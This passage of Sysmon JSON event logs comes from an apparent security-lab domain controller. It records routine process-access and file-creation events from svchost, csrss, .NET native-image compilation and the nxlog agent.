C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105C410D00}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8040,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.263\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-001036450D00}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.263","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-001036450D00}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8041,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.263\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-001036450D00}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.263","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-001036450D00}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8042,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.278\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1342-5F25-0000-001040A90D00}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.278","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1342-5F25-0000-001040A90D00}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8043,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:22.622\r\nProcessGuid: {E2A3D6B1-1342-5F25-0000-001040A90D00}\r\nProcessId: 1004\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\3ec-0\\PresentationFramework.Luna.dll\r\nCreationUtcTime: 2020-08-01 07:01:22.622","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:22.622","ProcessGuid":"{E2A3D6B1-1342-5F25-0000-001040A90D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\3ec-0\\PresentationFramework.Luna.dll","CreationUtcTime":"2020-08-01 07:01:22.622","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8044,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8045,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.669\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-001024CB0B00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.669","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-001024CB0B00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8046,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.669\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-001024CB0B00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.669","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-001024CB0B00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8047,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.685\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1342-5F25-0000-001073AE0D00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.685","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1342-5F25-0000-001073AE0D00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397b